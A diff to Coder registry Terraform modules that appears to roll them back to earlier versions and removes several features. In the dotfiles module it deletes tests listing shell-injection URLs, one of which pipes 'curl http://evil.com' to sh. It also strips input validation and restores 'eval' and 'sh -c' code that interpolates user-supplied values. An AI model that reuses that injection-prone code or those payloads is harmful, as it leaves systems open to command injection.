-  version         = "4.7.5"
+  version         = "4.7.4"
   agent_id        = coder_agent.main.id
   workdir         = "/home/coder/project"
   enable_boundary = true
@@ -68,7 +68,7 @@ For tasks integration with AI Bridge, add `enable_aibridge = true` to the [Usage
 ```tf
 module "claude-code" {
   source          = "registry.coder.com/coder/claude-code/coder"
-  version         = "4.7.5"
+  version         = "4.7.4"
   agent_id        = coder_agent.main.id
   workdir         = "/home/coder/project"
   enable_aibridge = true
@@ -97,7 +97,7 @@ data "coder_task" "me" {}
 
 module "claude-code" {
   source    = "registry.coder.com/coder/claude-code/coder"
-  version   = "4.7.5"
+  version   = "4.7.4"
   agent_id  = coder_agent.main.id
   workdir   = "/home/coder/project"
   ai_prompt = data.coder_task.me.prompt
@@ -120,7 +120,7 @@ This example shows additional configuration options for version pinning, custom
 ```tf
 module "claude-code" {
   source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.7.5"
+  version  = "4.7.4"
   agent_id = coder_agent.main.id
   workdir  = "/home/coder/project"
 
@@ -176,7 +176,7 @@ Run and configure Claude Code as a standalone CLI in your workspace.
 ```tf
 module "claude-code" {
   source              = "registry.coder.com/coder/claude-code/coder"
-  version             = "4.7.5"
+  version             = "4.7.4"
   agent_id            = coder_agent.main.id
   workdir             = "/home/coder/project"
   install_claude_code = true
@@ -198,7 +198,7 @@ variable "claude_code_oauth_token" {
 
 module "claude-code" {
   source                  = "registry.coder.com/coder/claude-code/coder"
-  version                 = "4.7.5"
+  version                 = "4.7.4"
   agent_id                = coder_agent.main.id
   workdir                 = "/home/coder/project"
   claude_code_oauth_token = var.claude_code_oauth_token
@@ -271,7 +271,7 @@ resource "coder_env" "bedrock_api_key" {
 
 module "claude-code" {
   source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.7.5"
+  version  = "4.7.4"
   agent_id = coder_agent.main.id
   workdir  = "/home/coder/project"
   model    = "global.anthropic.claude-sonnet-4-5-20250929-v1:0"
@@ -328,7 +328,7 @@ resource "coder_env" "google_application_credentials" {
 
 module "claude-code" {
   source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.7.5"
+  version  = "4.7.4"
   agent_id = coder_agent.main.id
   workdir  = "/home/coder/project"
   model    = "claude-sonnet-4@20250514"

registry/coder/modules/claude-code/main.tf

@@ -208,11 +208,6 @@ variable "claude_binary_path" {
   type        = string
   description = "Directory where the Claude Code binary is located. Use this if Claude is pre-installed or installed outside the module to a non-default location."
   default     = "$HOME/.local/bin"
-
-  validation {
-    condition     = var.claude_binary_path == "$HOME/.local/bin" || !var.install_claude_code
-    error_message = "Custom claude_binary_path can only be used when install_claude_code is false. The official installer always installs to $HOME/.local/bin and does not support custom paths."
-  }
 }
 
 variable "install_via_npm" {
@@ -295,6 +290,18 @@ resource "coder_env" "disable_autoupdater" {
   value    = "1"
 }
 
+resource "coder_env" "claude_binary_path" {
+  agent_id = var.agent_id
+  name     = "PATH"
+  value    = "${var.claude_binary_path}:$PATH"
+
+  lifecycle {
+    precondition {
+      condition     = var.claude_binary_path == "$HOME/.local/bin" || !var.install_claude_code
+      error_message = "Custom claude_binary_path can only be used when install_claude_code is false. The official installer and npm both install to fixed locations."
+    }
+  }
+}
 
 resource "coder_env" "anthropic_model" {
   count    = var.model != "" ? 1 : 0
@@ -375,27 +382,26 @@ module "agentapi" {
   pre_install_script   = var.pre_install_script
   post_install_script  = var.post_install_script
   start_script         = <<-EOT
-    #!/bin/bash
-    set -o errexit
-    set -o pipefail
-    echo -n '${base64encode(local.start_script)}' | base64 -d > /tmp/start.sh
-    chmod +x /tmp/start.sh
+     #!/bin/bash
+     set -o errexit
+     set -o pipefail
+     echo -n '${base64encode(local.start_script)}' | base64 -d > /tmp/start.sh
+     chmod +x /tmp/start.sh
 
-    ARG_RESUME_SESSION_ID='${var.resume_session_id}' \
-    ARG_CONTINUE='${var.continue}' \
-    ARG_DANGEROUSLY_SKIP_PERMISSIONS='${var.dangerously_skip_permissions}' \
-    ARG_PERMISSION_MODE='${var.permission_mode}' \
-    ARG_WORKDIR='${local.workdir}' \
-    ARG_AI_PROMPT='${base64encode(var.ai_prompt)}' \
-    ARG_REPORT_TASKS='${var.report_tasks}' \
-    ARG_ENABLE_BOUNDARY='${var.enable_boundary}' \
-    ARG_BOUNDARY_VERSION='${var.boundary_version}' \
-    ARG_COMPILE_FROM_SOURCE='${var.compile_boundary_from_source}' \
-    ARG_USE_BOUNDARY_DIRECTLY='${var.use_boundary_directly}' \
-    ARG_CODER_HOST='${local.coder_host}' \
-    ARG_CLAUDE_BINARY_PATH='${var.claude_binary_path}' \
-    /tmp/start.sh
-  EOT
+     ARG_RESUME_SESSION_ID='${var.resume_session_id}' \
+     ARG_CONTINUE='${var.continue}' \
+     ARG_DANGEROUSLY_SKIP_PERMISSIONS='${var.dangerously_skip_permissions}' \
+     ARG_PERMISSION_MODE='${var.permission_mode}' \
+     ARG_WORKDIR='${local.workdir}' \
+     ARG_AI_PROMPT='${base64encode(var.ai_prompt)}' \
+     ARG_REPORT_TASKS='${var.report_tasks}' \
+     ARG_ENABLE_BOUNDARY='${var.enable_boundary}' \
+     ARG_BOUNDARY_VERSION='${var.boundary_version}' \
+     ARG_COMPILE_FROM_SOURCE='${var.compile_boundary_from_source}' \
+     ARG_USE_BOUNDARY_DIRECTLY='${var.use_boundary_directly}' \
+     ARG_CODER_HOST='${local.coder_host}' \
+     /tmp/start.sh
+   EOT
 
   install_script = <<-EOT
     #!/bin/bash

registry/coder/modules/claude-code/scripts/install.sh

@@ -12,8 +12,6 @@ ARG_CLAUDE_CODE_VERSION=${ARG_CLAUDE_CODE_VERSION:-}
 ARG_WORKDIR=${ARG_WORKDIR:-"$HOME"}
 ARG_INSTALL_CLAUDE_CODE=${ARG_INSTALL_CLAUDE_CODE:-}
 ARG_CLAUDE_BINARY_PATH=${ARG_CLAUDE_BINARY_PATH:-"$HOME/.local/bin"}
-ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH/#\~/$HOME}"
-ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH//\$HOME/$HOME}"
 ARG_INSTALL_VIA_NPM=${ARG_INSTALL_VIA_NPM:-false}
 ARG_REPORT_TASKS=${ARG_REPORT_TASKS:-true}
 ARG_MCP_APP_STATUS_SLUG=${ARG_MCP_APP_STATUS_SLUG:-}
@@ -23,8 +21,6 @@ ARG_ALLOWED_TOOLS=${ARG_ALLOWED_TOOLS:-}
 ARG_DISALLOWED_TOOLS=${ARG_DISALLOWED_TOOLS:-}
 ARG_ENABLE_AIBRIDGE=${ARG_ENABLE_AIBRIDGE:-false}
 
-export PATH="$ARG_CLAUDE_BINARY_PATH:$PATH"
-
 echo "--------------------------------"
 
 printf "ARG_CLAUDE_CODE_VERSION: %s\n" "$ARG_CLAUDE_CODE_VERSION"
@@ -55,51 +51,39 @@ function add_mcp_servers() {
   done < <(echo "$mcp_json" | jq -r '.mcpServers | to_entries[] | .key, (.value | @json)')
 }
 
-function add_path_to_shell_profiles() {
-  local path_dir="$1"
-
-  for profile in "$HOME/.profile" "$HOME/.bash_profile" "$HOME/.bashrc" "$HOME/.zprofile" "$HOME/.zshrc"; do
-    if [ -f "$profile" ]; then
-      if ! grep -q "$path_dir" "$profile" 2> /dev/null; then
-        echo "export PATH=\"\$PATH:$path_dir\"" >> "$profile"
-        echo "Added $path_dir to $profile"
-      fi
-    fi
-  done
-
-  local fish_config="$HOME/.config/fish/config.fish"
-  if [ -f "$fish_config" ]; then
-    if ! grep -q "$path_dir" "$fish_config" 2> /dev/null; then
-      echo "fish_add_path $path_dir" >> "$fish_config"
-      echo "Added $path_dir to $fish_config"
-    fi
-  fi
-}
-
 function ensure_claude_in_path() {
-  local CLAUDE_BIN=""
-  if command -v claude > /dev/null 2>&1; then
-    CLAUDE_BIN=$(command -v claude)
-  elif [ -x "$ARG_CLAUDE_BINARY_PATH/claude" ]; then
-    CLAUDE_BIN="$ARG_CLAUDE_BINARY_PATH/claude"
-  elif [ -x "$HOME/.local/bin/claude" ]; then
-    CLAUDE_BIN="$HOME/.local/bin/claude"
-  fi
-
-  if [ -z "$CLAUDE_BIN" ] || [ ! -x "$CLAUDE_BIN" ]; then
-    echo "Warning: Could not find claude binary"
+  if [ -z "${CODER_SCRIPT_BIN_DIR:-}" ]; then
+    echo "CODER_SCRIPT_BIN_DIR not set, skipping PATH setup"
     return
   fi
 
-  local CLAUDE_DIR
-  CLAUDE_DIR=$(dirname "$CLAUDE_BIN")
+  if [ ! -e "$CODER_SCRIPT_BIN_DIR/claude" ]; then
+    local CLAUDE_BIN=""
+    if command -v claude > /dev/null 2>&1; then
+      CLAUDE_BIN=$(command -v claude)
+    elif [ -x "$ARG_CLAUDE_BINARY_PATH/claude" ]; then
+      CLAUDE_BIN="$ARG_CLAUDE_BINARY_PATH/claude"
+    elif [ -x "$HOME/.local/bin/claude" ]; then
+      CLAUDE_BIN="$HOME/.local/bin/claude"
+    fi
 
-  if [ -n "${CODER_SCRIPT_BIN_DIR:-}" ] && [ ! -e "$CODER_SCRIPT_BIN_DIR/claude" ]; then
-    ln -s "$CLAUDE_BIN" "$CODER_SCRIPT_BIN_DIR/claude"
-    echo "Created symlink: $CODER_SCRIPT_BIN_DIR/claude -> $CLAUDE_BIN"
+    if [ -n "$CLAUDE_BIN" ] && [ -x "$CLAUDE_BIN" ]; then
+      ln -s "$CLAUDE_BIN" "$CODER_SCRIPT_BIN_DIR/claude"
+      echo "Created symlink: $CODER_SCRIPT_BIN_DIR/claude -> $CLAUDE_BIN"
+    else
+      echo "Warning: Could not find claude binary to symlink"
+    fi
+  else
+    echo "Claude already available in CODER_SCRIPT_BIN_DIR"
   fi
 
-  add_path_to_shell_profiles "$CLAUDE_DIR"
+  local marker="# Added by claude-code module"
+  for profile in "$HOME/.bashrc" "$HOME/.zshrc" "$HOME/.profile"; do
+    if [ -f "$profile" ] && ! grep -q "$marker" "$profile" 2> /dev/null; then
+      printf "\n%s\nexport PATH=\"%s:\$PATH\"\n" "$marker" "$CODER_SCRIPT_BIN_DIR" >> "$profile"
+      echo "Added $CODER_SCRIPT_BIN_DIR to PATH in $profile"
+    fi
+  done
 }
 
 function install_claude_code_cli() {

registry/coder/modules/claude-code/scripts/start.sh

@@ -2,12 +2,6 @@
 
 set -euo pipefail
 
-ARG_CLAUDE_BINARY_PATH=${ARG_CLAUDE_BINARY_PATH:-"$HOME/.local/bin"}
-ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH/#\~/$HOME}"
-ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH//\$HOME/$HOME}"
-
-export PATH="$ARG_CLAUDE_BINARY_PATH:$PATH"
-
 command_exists() {
   command -v "$1" > /dev/null 2>&1
 }

registry/coder/modules/code-server/README.md

@@ -14,7 +14,7 @@ Automatically install [code-server](https://github.com/coder/code-server) in a w
 module "code-server" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/code-server/coder"
-  version  = "1.4.3"
+  version  = "1.4.2"
   agent_id = coder_agent.example.id
 }
 ```
@@ -29,7 +29,7 @@ module "code-server" {
 module "code-server" {
   count           = data.coder_workspace.me.start_count
   source          = "registry.coder.com/coder/code-server/coder"
-  version         = "1.4.3"
+  version         = "1.4.2"
   agent_id        = coder_agent.example.id
   install_version = "4.106.3"
 }
@@ -43,7 +43,7 @@ Install the Dracula theme from [OpenVSX](https://open-vsx.org/):
 module "code-server" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/code-server/coder"
-  version  = "1.4.3"
+  version  = "1.4.2"
   agent_id = coder_agent.example.id
   extensions = [
     "dracula-theme.theme-dracula"
@@ -61,7 +61,7 @@ Configure VS Code's [settings.json](https://code.visualstudio.com/docs/getstarte
 module "code-server" {
   count      = data.coder_workspace.me.start_count
   source     = "registry.coder.com/coder/code-server/coder"
-  version    = "1.4.3"
+  version    = "1.4.2"
   agent_id   = coder_agent.example.id
   extensions = ["dracula-theme.theme-dracula"]
   settings = {
@@ -78,7 +78,7 @@ Just run code-server in the background, don't fetch it from GitHub:
 module "code-server" {
   count      = data.coder_workspace.me.start_count
   source     = "registry.coder.com/coder/code-server/coder"
-  version    = "1.4.3"
+  version    = "1.4.2"
   agent_id   = coder_agent.example.id
   extensions = ["dracula-theme.theme-dracula", "ms-azuretools.vscode-docker"]
 }
@@ -92,7 +92,7 @@ You can pass additional command-line arguments to code-server using the `additio
 module "code-server" {
   count           = data.coder_workspace.me.start_count
   source          = "registry.coder.com/coder/code-server/coder"
-  version         = "1.4.3"
+  version         = "1.4.2"
   agent_id        = coder_agent.example.id
   additional_args = "--disable-workspace-trust"
 }
@@ -108,7 +108,7 @@ Run an existing copy of code-server if found, otherwise download from GitHub:
 module "code-server" {
   count      = data.coder_workspace.me.start_count
   source     = "registry.coder.com/coder/code-server/coder"
-  version    = "1.4.3"
+  version    = "1.4.2"
   agent_id   = coder_agent.example.id
   use_cached = true
   extensions = ["dracula-theme.theme-dracula", "ms-azuretools.vscode-docker"]
@@ -121,7 +121,7 @@ Just run code-server in the background, don't fetch it from GitHub:
 module "code-server" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/code-server/coder"
-  version  = "1.4.3"
+  version  = "1.4.2"
   agent_id = coder_agent.example.id
   offline  = true
 }

registry/coder/modules/code-server/main.tf

@@ -44,7 +44,7 @@ variable "settings" {
   default     = {}
 }
 
-variable "machine_settings" {
+variable "machine-settings" {
   type        = any
   description = "A map of template level machine settings to apply to code-server. This will be overwritten at each container start."
   default     = {}
@@ -167,7 +167,7 @@ resource "coder_script" "code-server" {
     INSTALL_PREFIX : var.install_prefix,
     // This is necessary otherwise the quotes are stripped!
     SETTINGS : replace(jsonencode(var.settings), "\"", "\\\""),
-    MACHINE_SETTINGS : replace(jsonencode(var.machine_settings), "\"", "\\\""),
+    MACHINE_SETTINGS : replace(jsonencode(var.machine-settings), "\"", "\\\""),
     OFFLINE : var.offline,
     USE_CACHED : var.use_cached,
     USE_CACHED_EXTENSIONS : var.use_cached_extensions,

registry/coder/modules/cursor/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "cursor" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.1"
+  version  = "1.4.0"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "cursor" {
 module "cursor" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.1"
+  version  = "1.4.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }
@@ -45,7 +45,7 @@ The following example configures Cursor to use the GitHub MCP server with authen
 module "cursor" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.1"
+  version  = "1.4.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/cursor/main.tf

@@ -66,7 +66,7 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.0"
 
   agent_id = var.agent_id
 

registry/coder/modules/dotfiles/README.md

@@ -18,7 +18,7 @@ Under the hood, this module uses the [coder dotfiles](https://coder.com/docs/v2/
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.3.1"
+  version  = "1.2.3"
   agent_id = coder_agent.example.id
 }
 ```
@@ -31,7 +31,7 @@ module "dotfiles" {
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.3.1"
+  version  = "1.2.3"
   agent_id = coder_agent.example.id
 }
 ```
@@ -42,7 +42,7 @@ module "dotfiles" {
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.3.1"
+  version  = "1.2.3"
   agent_id = coder_agent.example.id
   user     = "root"
 }
@@ -54,14 +54,14 @@ module "dotfiles" {
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.3.1"
+  version  = "1.2.3"
   agent_id = coder_agent.example.id
 }
 
 module "dotfiles-root" {
   count        = data.coder_workspace.me.start_count
   source       = "registry.coder.com/coder/dotfiles/coder"
-  version      = "1.3.1"
+  version      = "1.2.3"
   agent_id     = coder_agent.example.id
   user         = "root"
   dotfiles_uri = module.dotfiles.dotfiles_uri
@@ -76,7 +76,7 @@ You can set a default dotfiles repository for all users by setting the `default_
 module "dotfiles" {
   count                = data.coder_workspace.me.start_count
   source               = "registry.coder.com/coder/dotfiles/coder"
-  version              = "1.3.1"
+  version              = "1.2.3"
   agent_id             = coder_agent.example.id
   default_dotfiles_uri = "https://github.com/coder/dotfiles"
 }

registry/coder/modules/dotfiles/main.test.ts

@@ -12,48 +12,20 @@ describe("dotfiles", async () => {
     agent_id: "foo",
   });
 
-  it("default output is empty string", async () => {
+  it("default output", async () => {
     const state = await runTerraformApply(import.meta.dir, {
       agent_id: "foo",
     });
     expect(state.outputs.dotfiles_uri.value).toBe("");
   });
 
-  it("accepts valid git URL formats", async () => {
-    const validUrls = [
-      "https://github.com/coder/dotfiles",
-      "https://github.com/coder/dotfiles.git",
-      "git@github.com:coder/dotfiles.git",
-      "git://github.com/coder/dotfiles.git",
-      "ssh://git@github.com/coder/dotfiles.git",
-      "ssh://git@bitbucket.example.org:7999/~myusername/dotfiles.git",
-    ];
-    for (const url of validUrls) {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        dotfiles_uri: url,
-      });
-      expect(state.outputs.dotfiles_uri.value).toBe(url);
-    }
-  });
-
-  it("rejects invalid or malicious URLs", async () => {
-    const invalidUrls = [
-      "https://github.com/user/repo; curl http://evil.com | sh",
-      "https://github.com/$(whoami)/repo",
-      "https://github.com/`id`/repo",
-      "https://github.com/user/repo|cat /etc/passwd",
-      "file:///etc/passwd",
-      "not-a-valid-url",
-    ];
-    for (const url of invalidUrls) {
-      await expect(
-        runTerraformApply(import.meta.dir, {
-          agent_id: "foo",
-          dotfiles_uri: url,
-        }),
-      ).rejects.toThrow();
-    }
+  it("set a default dotfiles_uri", async () => {
+    const default_dotfiles_uri = "foo";
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      default_dotfiles_uri,
+    });
+    expect(state.outputs.dotfiles_uri.value).toBe(default_dotfiles_uri);
   });
 
   it("set custom order for coder_parameter", async () => {

registry/coder/modules/dotfiles/main.tf

@@ -36,40 +36,19 @@ variable "default_dotfiles_uri" {
   type        = string
   description = "The default dotfiles URI if the workspace user does not provide one"
   default     = ""
-
-  validation {
-    condition = (
-      var.default_dotfiles_uri == "" ||
-      can(regex("^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@~-]+$", var.default_dotfiles_uri))
-    )
-    error_message = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
-  }
 }
 
 variable "dotfiles_uri" {
   type        = string
   description = "The URL to a dotfiles repository. (optional, when set, the user isn't prompted for their dotfiles)"
-  default     = null
 
-  validation {
-    condition = (
-      var.dotfiles_uri == null ||
-      var.dotfiles_uri == "" ||
-      can(regex("^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@~-]+$", var.dotfiles_uri))
-    )
-    error_message = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
-  }
+  default = null
 }
 
 variable "user" {
   type        = string
   description = "The name of the user to apply the dotfiles to. (optional, applies to the current user by default)"
   default     = null
-
-  validation {
-    condition     = var.user == null || can(regex("^[a-zA-Z_][a-zA-Z0-9_-]*$", var.user))
-    error_message = "Must be a valid username without special characters."
-  }
 }
 
 variable "coder_parameter_order" {
@@ -84,12 +63,6 @@ variable "manual_update" {
   default     = false
 }
 
-variable "post_clone_script" {
-  description = "Custom script to run after applying dotfiles. Runs every time, even if dotfiles were already applied."
-  type        = string
-  default     = null
-}
-
 data "coder_parameter" "dotfiles_uri" {
   count        = var.dotfiles_uri == null ? 1 : 0
   type         = "string"
@@ -100,25 +73,18 @@ data "coder_parameter" "dotfiles_uri" {
   description  = var.description
   mutable      = true
   icon         = "/icon/dotfiles.svg"
-
-  validation {
-    regex = "^$|^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@~-]+$"
-    error = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
-  }
 }
 
 locals {
-  dotfiles_uri              = var.dotfiles_uri != null ? var.dotfiles_uri : data.coder_parameter.dotfiles_uri[0].value
-  user                      = var.user != null ? var.user : ""
-  encoded_post_clone_script = var.post_clone_script != null ? base64encode(var.post_clone_script) : ""
+  dotfiles_uri = var.dotfiles_uri != null ? var.dotfiles_uri : data.coder_parameter.dotfiles_uri[0].value
+  user         = var.user != null ? var.user : ""
 }
 
 resource "coder_script" "dotfiles" {
   agent_id = var.agent_id
   script = templatefile("${path.module}/run.sh", {
     DOTFILES_URI : local.dotfiles_uri,
-    DOTFILES_USER : local.user,
-    POST_CLONE_SCRIPT : local.encoded_post_clone_script
+    DOTFILES_USER : local.user
   })
   display_name = "Dotfiles"
   icon         = "/icon/dotfiles.svg"
@@ -135,8 +101,7 @@ resource "coder_app" "dotfiles" {
   group        = var.group
   command = templatefile("${path.module}/run.sh", {
     DOTFILES_URI : local.dotfiles_uri,
-    DOTFILES_USER : local.user,
-    POST_CLONE_SCRIPT : local.encoded_post_clone_script
+    DOTFILES_USER : local.user
   })
 }
 

registry/coder/modules/dotfiles/run.sh

@@ -5,19 +5,6 @@ set -euo pipefail
 DOTFILES_URI="${DOTFILES_URI}"
 DOTFILES_USER="${DOTFILES_USER}"
 
-# Validate DOTFILES_URI to prevent command injection (defense in depth)
-if [ -n "$DOTFILES_URI" ]; then
-  # shellcheck disable=SC2250
-  if [[ "$DOTFILES_URI" =~ [^a-zA-Z0-9._/:@-] ]]; then
-    echo "ERROR: DOTFILES_URI contains invalid characters" >&2
-    exit 1
-  fi
-  if ! [[ "$DOTFILES_URI" =~ ^(https?://|ssh://|git@|git://) ]]; then
-    echo "ERROR: DOTFILES_URI must be a valid repository URL (https://, http://, ssh://, git@, or git://)" >&2
-    exit 1
-  fi
-fi
-
 # shellcheck disable=SC2157
 if [ -n "$${DOTFILES_URI// }" ]; then
   if [ -z "$DOTFILES_USER" ]; then
@@ -29,28 +16,12 @@ if [ -n "$${DOTFILES_URI// }" ]; then
   if [ "$DOTFILES_USER" = "$USER" ]; then
     coder dotfiles "$DOTFILES_URI" -y 2>&1 | tee ~/.dotfiles.log
   else
-    if command -v getent > /dev/null 2>&1; then
-      DOTFILES_USER_HOME=$(getent passwd "$DOTFILES_USER" | cut -d: -f6)
-    else
-      DOTFILES_USER_HOME=$(awk -F: -v user="$DOTFILES_USER" '$1 == user {print $6}' /etc/passwd)
-    fi
-    if [ -z "$DOTFILES_USER_HOME" ]; then
-      echo "ERROR: Could not determine home directory for user $DOTFILES_USER" >&2
-      exit 1
-    fi
+    # The `eval echo ~"$DOTFILES_USER"` part is used to dynamically get the home directory of the user, see https://superuser.com/a/484280
+    # eval echo ~coder -> "/home/coder"
+    # eval echo ~root  -> "/root"
 
-    CODER_BIN=$(command -v coder)
-    sudo -u "$DOTFILES_USER" "$CODER_BIN" dotfiles "$DOTFILES_URI" -y 2>&1 | tee "$DOTFILES_USER_HOME/.dotfiles.log"
+    CODER_BIN=$(which coder)
+    DOTFILES_USER_HOME=$(eval echo ~"$DOTFILES_USER")
+    sudo -u "$DOTFILES_USER" sh -c "'$CODER_BIN' dotfiles '$DOTFILES_URI' -y 2>&1 | tee '$DOTFILES_USER_HOME'/.dotfiles.log"
   fi
 fi
-
-POST_CLONE_SCRIPT="${POST_CLONE_SCRIPT}"
-
-if [ -n "$POST_CLONE_SCRIPT" ]; then
-  echo "Running post-clone script..."
-  POST_CLONE_TMP=$(mktemp)
-  echo "$POST_CLONE_SCRIPT" | base64 -d > "$POST_CLONE_TMP"
-  chmod +x "$POST_CLONE_TMP"
-  $POST_CLONE_TMP
-  rm "$POST_CLONE_TMP"
-fi

registry/coder/modules/jetbrains/README.md

@@ -42,7 +42,7 @@ module "jetbrains" {
   version  = "1.3.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
-  default  = ["PY", "IU"] # Pre-configure PyCharm and IntelliJ IDEA
+  default  = ["PY", "IU"] # Pre-configure GoLand and IntelliJ IDEA
 }
 ```
 

registry/coder/modules/kasmvnc/README.md

@@ -14,7 +14,7 @@ Automatically install [KasmVNC](https://kasmweb.com/kasmvnc) in a workspace, and
 module "kasmvnc" {
   count               = data.coder_workspace.me.start_count
   source              = "registry.coder.com/coder/kasmvnc/coder"
-  version             = "1.3.0"
+  version             = "1.2.7"
   agent_id            = coder_agent.example.id
   desktop_environment = "xfce"
   subdomain           = true

registry/coder/modules/kasmvnc/main.tf

@@ -54,15 +54,6 @@ variable "subdomain" {
   description = "Is subdomain sharing enabled in your cluster?"
 }
 
-variable "share" {
-  type    = string
-  default = "owner"
-  validation {
-    condition     = var.share == "owner" || var.share == "authenticated" || var.share == "public"
-    error_message = "Incorrect value. Please set either 'owner', 'authenticated', or 'public'."
-  }
-}
-
 resource "coder_script" "kasm_vnc" {
   agent_id     = var.agent_id
   display_name = "KasmVNC"
@@ -84,7 +75,7 @@ resource "coder_app" "kasm_vnc" {
   url          = "http://localhost:${var.port}"
   icon         = "/icon/kasmvnc.svg"
   subdomain    = var.subdomain
-  share        = var.share
+  share        = "owner"
   order        = var.order
   group        = var.group
 

registry/coder/modules/kiro/README.md

@@ -18,7 +18,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "kiro" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
   agent_id = coder_agent.main.id
 }
 ```
@@ -31,7 +31,7 @@ module "kiro" {
 module "kiro" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }
@@ -47,7 +47,7 @@ The following example configures Kiro to use the GitHub MCP server with authenti
 module "kiro" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/kiro/main.tf

@@ -53,7 +53,7 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.0"
 
   agent_id = var.agent_id
 

registry/coder/modules/mux/README.md

@@ -8,13 +8,13 @@ tags: [ai, agents, development, multiplexer]
 
 # Mux
 
-Automatically install and run [Mux](https://github.com/coder/mux) in a Coder workspace. By default, the module auto-detects an available package manager (`npm`, `pnpm`, or `bun`) to install `mux@next` (with a fallback to downloading the npm tarball if none is found). You can also force a specific package manager via `package_manager` and point to a custom registry with `registry_url`. Mux is a desktop application for parallel agentic development that enables developers to run multiple AI agents simultaneously across isolated workspaces.
+Automatically install and run [Mux](https://github.com/coder/mux) in a Coder workspace. By default, the module installs `mux@next` from npm (with a fallback to downloading the npm tarball if npm is unavailable). Mux is a desktop application for parallel agentic development that enables developers to run multiple AI agents simultaneously across isolated workspaces.
 
 ```tf
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.3.1"
+  version  = "1.0.8"
   agent_id = coder_agent.main.id
 }
 ```
@@ -37,7 +37,7 @@ module "mux" {
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.3.1"
+  version  = "1.0.8"
   agent_id = coder_agent.main.id
 }
 ```
@@ -48,7 +48,7 @@ module "mux" {
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.3.1"
+  version  = "1.0.8"
   agent_id = coder_agent.main.id
   # Default is "latest"; set to a specific version to pin
   install_version = "0.4.0"
@@ -63,24 +63,9 @@ Start Mux with `mux server --add-project /path/to/project`:
 module "mux" {
   count       = data.coder_workspace.me.start_count
   source      = "registry.coder.com/coder/mux/coder"
-  version     = "1.3.1"
+  version     = "1.0.8"
   agent_id    = coder_agent.main.id
-  add_project = "/path/to/project"
-}
-```
-
-### Pass Arbitrary `mux server` Arguments
-
-Use `additional_arguments` to append additional arguments to `mux server`.
-The module parses quoted values, so grouped arguments remain intact.
-
-```tf
-module "mux" {
-  count                = data.coder_workspace.me.start_count
-  source               = "registry.coder.com/coder/mux/coder"
-  version              = "1.3.1"
-  agent_id             = coder_agent.main.id
-  additional_arguments = "--open-mode pinned --add-project '/workspaces/my repo'"
+  add-project = "/path/to/project"
 }
 ```
 
@@ -90,40 +75,12 @@ module "mux" {
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.3.1"
+  version  = "1.0.8"
   agent_id = coder_agent.main.id
   port     = 8080
 }
 ```
 
-### Custom Package Manager
-
-Force a specific package manager instead of auto-detection:
-
-```tf
-module "mux" {
-  count           = data.coder_workspace.me.start_count
-  source          = "registry.coder.com/coder/mux/coder"
-  version         = "1.3.1"
-  agent_id        = coder_agent.main.id
-  package_manager = "pnpm" # or "npm", "bun"
-}
-```
-
-### Custom Registry
-
